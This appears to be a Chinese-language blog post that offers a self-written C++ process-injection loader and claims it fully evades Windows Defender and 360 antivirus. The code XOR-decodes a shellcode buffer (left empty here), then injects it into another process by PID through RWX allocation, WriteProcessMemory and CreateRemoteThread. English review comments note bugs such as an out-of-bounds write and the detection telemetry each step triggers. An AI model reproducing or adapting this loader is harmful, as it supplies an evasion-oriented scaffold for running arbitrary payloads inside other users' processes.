程序注入免殺學習
阿新 • • 發佈:2020-12-24
程序注入免殺學習
下面是自寫的程序注入程式碼,已經對主要程式碼進行註釋,相關函式如有不懂請檢視官方文件,Windows Defender、360全程免殺。
案例
#include <iostream>
#include <windows.h>
// NOTE(review): printf and atoi are used below but <cstdio>/<cstdlib> are not
// included; the build relies on them arriving transitively via the two headers
// above.

/*
 * Textbook remote-thread process injection: open a target process by PID,
 * allocate an RWX region inside it, copy a locally XOR-decoded buffer there and
 * start a thread at the region's base address.
 *
 * The comments below are review notes: they record the defects in the listing
 * and the behaviour each step exposes to host telemetry; the code itself is
 * left as the author wrote it.
 *
 * argv[1]: decimal PID of the target process (not validated, see below).
 * Returns 0 unconditionally; no Win32 return value is checked, so any failed
 * step is silent.
 */
int main(int argc, char* argv[]) {
    //unsigned char KEY = 10;
    // Payload buffer, stored XOR-encoded with key 10 and decoded in place by the
    // loop below. It is empty in this listing, so sizeof(shellcode) == 1 (just
    // the terminating NUL).
    unsigned char shellcode[] =""; // shellcode after XOR encoding
    //unsigned char en_shellcode[] = "";
    //int n = 0;
    HANDLE processHandle;
    HANDLE remoteThread; // NOTE(review): never passed to CloseHandle -> handle leak
    PVOID remoteBuffer;
    // BUG: `<=` runs one iteration past the end of the array; the final
    // iteration writes shellcode[sizeof(shellcode)], which is out of bounds and
    // undefined behaviour. `i < sizeof(shellcode)` is the intended bound, and
    // `i` (signed int) is compared against a size_t.
    for (int i = 0; i <= sizeof(shellcode); i++) {
        shellcode[i] ^= 10; // 10 is the XOR key
    }
    /*
     * Steps:
     *  - read the PID to inject into from the command line
     *  - open the target process
     *  - allocate memory in the target and write the payload into it
     *  - create a remote thread at the payload
     *  - close the process handle
     */
    // BUG: argv[1] is dereferenced without checking argc; with no argument it is
    // NULL and atoi(NULL) is undefined behaviour. atoi also gives no error
    // indication for non-numeric input, unlike strtoul. The PID is parsed twice
    // (here and in OpenProcess) instead of once into a local.
    printf("Injecting to PID: %i", atoi(argv[1]));
    // Cross-process open with PROCESS_ALL_ACCESS. The return value is not
    // checked: it is NULL on failure (insufficient privilege, protected
    // process, bad PID) and every later call then silently fails. From the
    // defender's side, this open followed by the remote RWX allocation,
    // cross-process write and CreateRemoteThread below is the canonical
    // injection sequence that EDR and Sysmon-style telemetry records.
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
    // Remote allocation with PAGE_EXECUTE_READWRITE (writable and executable at
    // once). Return value not checked: NULL on failure, which then becomes the
    // destination of the write and the start address of the thread below.
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    // Cross-process write of the decoded buffer. Both the BOOL result and the
    // bytes-written count (last argument, passed as NULL) are ignored.
    WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
    // Starts execution at the remote buffer. Sysmon Event ID 8 (CreateRemoteThread)
    // captures exactly this call with source PID, target PID and start address.
    // Return value (NULL on failure) is ignored and the thread handle is never
    // released.
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    // Only the process handle is released; remoteThread leaks (see above).
    CloseHandle(processHandle);
    return 0;
}